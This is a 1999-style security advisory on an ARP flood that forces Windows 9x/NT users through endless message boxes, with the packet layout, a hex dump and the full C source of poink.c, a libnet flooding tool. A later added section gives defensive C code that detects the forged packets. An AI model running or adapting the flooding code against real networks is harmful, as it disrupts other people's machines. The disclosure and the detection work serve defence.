COMMAND
ARP
SYSTEMS AFFECTED
Windows9X, NT
PROBLEM
Joel Jacobson found the following. He found a problem in the way
Windows 9x/NT handles ARP packets. If you flood a computer on your
LAN with the packet below, its user will be forced to click a
message box's OK button x times, where x is the number of packets
you flooded it with. There is no way to trace the flooder, since the
MAC address in the packet can be set to anything. Badly configured
routers will not drop this packet. When this was tested on a LAN, a
computer on another class C subnet of the same LAN could be flooded
without problems. The program NetXRay was used to perform the flood.
The victims had to reboot their computer, or choose to click _very_
many OK buttons. The ARP packet is built up like this:
Ethernet Version II:
    Address: XX-XX-XX-XX-XX-XX ---> FF-FF-FF-FF-FF-FF
    Ethernet II Protocol Type: ARP
Address Resolution Protocol:
    Hardware Type: 1 (Ethernet)
    Protocol Type: 800 (hex; IP)
    Hardware Address Length: 6
    Protocol Address Length: 4
    Operation: ARP Request
    Source Hardware Address: XX-XX-XX-XX-XX-XX
    IP Source Address: <victim computer's IP>
    Destination Hardware Address: XX-XX-XX-XX-XX-XX
    IP Destination Address: <victim computer's IP>
And in hex the packet looks like this:
ff ff ff ff ff ff 00 00 00 00 00 00 08 06 08 00 06 04 00 01 00 00 00
00 00 00 XX XX XX XX 00 00 00 00 00 00 XX XX XX XX
(XX is what matters here)
XX XX XX XX is the victim's IP address, in hex. For example, if you
want to flood IP 192.168.0.1 on your network you would enter this
hex value: C0 A8 00 01. Here is the exploit (it kills the MS PPTP
tunnel on NT WKS SP4 (PPTP client)):
/*
 *  $Id$
 *
 *  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
 *                     route|daemon9 <route@infonexus.com>
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently: http://lazy.accessus.net/~route/libnet
 *  Soon:      http://www.packetfactory.net/
 *
 *  gcc poink.c -o poink -lnet
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

#include <libnet.h>

/* Ethernet source address written into the frame; arbitrary, as the advisory notes. */
u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
/* Ethernet broadcast destination. */
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

int send_arp(struct link_int *, u_long, u_char *);
void usage(u_char *);

int
main(int argc, char *argv[])
{
    int c, amount;
    char errbuf[256];
    char *device = NULL;
    struct link_int *l;
    u_long ip;

    amount = 20;                            /* default packet count */
    while ((c = getopt(argc, argv, "n:i:")) != EOF)
    {
        switch (c)
        {
            case 'i':
                device = optarg;
                break;
            case 'n':
                amount = atoi(optarg);
                break;
            default:
                exit(EXIT_FAILURE);
        }
    }

    if (!device)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    if (argc <= optind)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
    {
        fprintf(stderr, "Cannot resolve IP address\n");
        exit(EXIT_FAILURE);
    }

    l = libnet_open_link_interface(device, errbuf);
    if (!l)
    {
        fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    c = 0;                                  /* so a zero count is not reported as failure */
    while (amount--)
    {
        c = send_arp(l, ip, device);
        if (c == -1)
        {
            /* bail on the first error */
            break;
        }
    }
    printf("\n");
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
    {
        perror("libnet_init_packet memory:");
        exit(EXIT_FAILURE);
    }

    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);

    /*
     *  ARP header: a request in which sender and target protocol address
     *  are both the victim's IP, matching the layout in the advisory.
     */
    libnet_build_arp(ARPHRD_ETHER,
            ETHERTYPE_IP,
            6,
            4,
            ARPOP_REQUEST,
            enet_src,
            (u_char *)&ip,
            enet_dst,
            (u_char *)&ip,
            NULL,
            0,
            buf + ETH_H);

    n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);
    fprintf(stderr, ".");
    libnet_destroy_packet(&buf);
    return (n);
}

void
usage(u_char *name)
{
    fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
}
SOLUTION
Nothing yet.
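The following is an added example, not part of the advisory or of poink.c: a small C program written from the defender's side that parses a raw Ethernet II / ARP frame of the shape described in the PROBLEM section and flags it. It keys on two things the packet layout above makes visible: the request asks for the same IP address it claims to come from (sender and target protocol address both equal to the victim), and the sender hardware address is forged (here the all-zero address of the hex dump). Because a single packet of that shape also occurs as legitimate gratuitous ARP, a per-target counter turns a run of such requests into the alert. The sample frames are constructed here from the field listing, using the 192.168.0.1 example; note that the printed hex dump above is two bytes short of a full 42-byte frame, because the hardware-type field (00 01) is missing between the ARP ethertype (08 06) and the protocol type (08 00), and the constructed sample includes it. All function names, the verdict values and the threshold of 10 are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum arp_verdict {
    ARP_NOT_ARP = -1,               /* not a well-formed Ethernet II / IPv4-over-Ethernet ARP frame */
    ARP_NORMAL = 0,                 /* ordinary request or reply */
    ARP_SELF_REQUEST = 1,           /* request with sender IP == target IP (gratuitous shape) */
    ARP_SELF_REQUEST_NULL_SHA = 2   /* ...and an all-zero sender MAC, i.e. forged */
};

struct arp_frame {
    uint8_t  eth_dst[6], eth_src[6], sha[6], tha[6], hlen, plen;
    uint16_t ethertype, htype, ptype, oper;
    uint32_t spa, tpa;              /* IPv4 addresses in host byte order */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }

/* Returns 0 on success, -1 if buf is not a 14-byte Ethernet II header followed by a 28-byte ARP body. */
int parse_arp_frame(const uint8_t *buf, size_t len, struct arp_frame *f)
{
    const uint8_t *a;
    if (len < 14 + 28 || rd16(buf + 12) != 0x0806) return -1;
    memcpy(f->eth_dst, buf, 6);  memcpy(f->eth_src, buf + 6, 6);  f->ethertype = 0x0806;
    a = buf + 14;
    f->htype = rd16(a);  f->ptype = rd16(a + 2);  f->hlen = a[4];  f->plen = a[5];  f->oper = rd16(a + 6);
    if (f->htype != 1 || f->ptype != 0x0800 || f->hlen != 6 || f->plen != 4) return -1;
    memcpy(f->sha, a + 8, 6);   f->spa = rd32(a + 14);
    memcpy(f->tha, a + 18, 6);  f->tpa = rd32(a + 24);
    return 0;
}

/* A request that asks for the very address its sender claims is the shape of the
 * advisory's packet. Real gratuitous ARP looks the same but carries the host's
 * actual MAC, so an all-zero sender MAC is the strongest single-packet signal. */
int classify_arp(const struct arp_frame *f)
{
    static const uint8_t null_mac[6] = {0, 0, 0, 0, 0, 0};
    if (f->oper != 1 || f->spa != f->tpa) return ARP_NORMAL;
    return memcmp(f->sha, null_mac, 6) == 0 ? ARP_SELF_REQUEST_NULL_SHA : ARP_SELF_REQUEST;
}

int inspect_frame(const uint8_t *buf, size_t len)
{
    struct arp_frame f;
    return parse_arp_frame(buf, len, &f) == 0 ? classify_arp(&f) : ARP_NOT_ARP;
}

/* One gratuitous ARP for a host is normal; a run of them for the same target is
 * the flood. monitor_observe returns 1 the moment the threshold is reached. */
struct arp_flood_monitor { uint32_t target_ip; unsigned seen, threshold; };

int monitor_observe(struct arp_flood_monitor *m, const struct arp_frame *f)
{
    if (classify_arp(f) == ARP_NORMAL) return 0;
    if (m->seen == 0 || m->target_ip != f->tpa) { m->target_ip = f->tpa; m->seen = 0; }
    return ++m->seen >= m->threshold;
}

/* Constructed sample, not a capture: the advisory's frame with XX = C0 A8 00 01
 * (192.168.0.1), including the hardware-type bytes 00 01 the printed dump omits. */
static const uint8_t sample_flood_frame[42] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x00,0x00,0x00,0x00,0x00,0x00, /* dst broadcast, src all-zero */
    0x08,0x06,                                /* ethertype: ARP */
    0x00,0x01, 0x08,0x00, 0x06, 0x04,         /* htype 1, ptype 0x0800, hlen 6, plen 4 */
    0x00,0x01,                                /* opcode: request */
    0x00,0x00,0x00,0x00,0x00,0x00, 0xc0,0xa8,0x00,0x01,   /* sender MAC all-zero, sender IP 192.168.0.1 */
    0x00,0x00,0x00,0x00,0x00,0x00, 0xc0,0xa8,0x00,0x01    /* target MAC unknown, target IP 192.168.0.1 */
};

/* Constructed ordinary request: 192.168.0.2 (00:11:22:33:44:55) asking for 192.168.0.1. */
static const uint8_t sample_normal_frame[42] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x00,0x11,0x22,0x33,0x44,0x55, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 0x06, 0x04, 0x00,0x01,
    0x00,0x11,0x22,0x33,0x44,0x55, 0xc0,0xa8,0x00,0x02,
    0x00,0x00,0x00,0x00,0x00,0x00, 0xc0,0xa8,0x00,0x01
};

/* Feed the flood frame n times; returns the packet number at which the monitor
 * (threshold 10) fired, or 0 if it never did. */
unsigned simulate_flood(unsigned n)
{
    struct arp_flood_monitor m = {0, 0, 10};
    struct arp_frame f;
    if (parse_arp_frame(sample_flood_frame, sizeof sample_flood_frame, &f) != 0) return 0;
    for (unsigned i = 1; i <= n; i++)
        if (monitor_observe(&m, &f)) return i;
    return 0;
}

int main(void)
{
    printf("flood frame verdict : %d\n", inspect_frame(sample_flood_frame, sizeof sample_flood_frame));
    printf("normal frame verdict: %d\n", inspect_frame(sample_normal_frame, sizeof sample_normal_frame));
    printf("monitor fired after : %u packets\n", simulate_flood(20));
    return 0;
}
```

Wired to a capture source, inspect_frame and monitor_observe are the pieces to call per frame. The verdict is a heuristic: a host announcing its own address after an interface comes up produces one ARP_SELF_REQUEST, so only the all-zero sender MAC or the counter crossing its threshold should raise an alert, and comparing the sender MAC against the target's known address is the natural refinement.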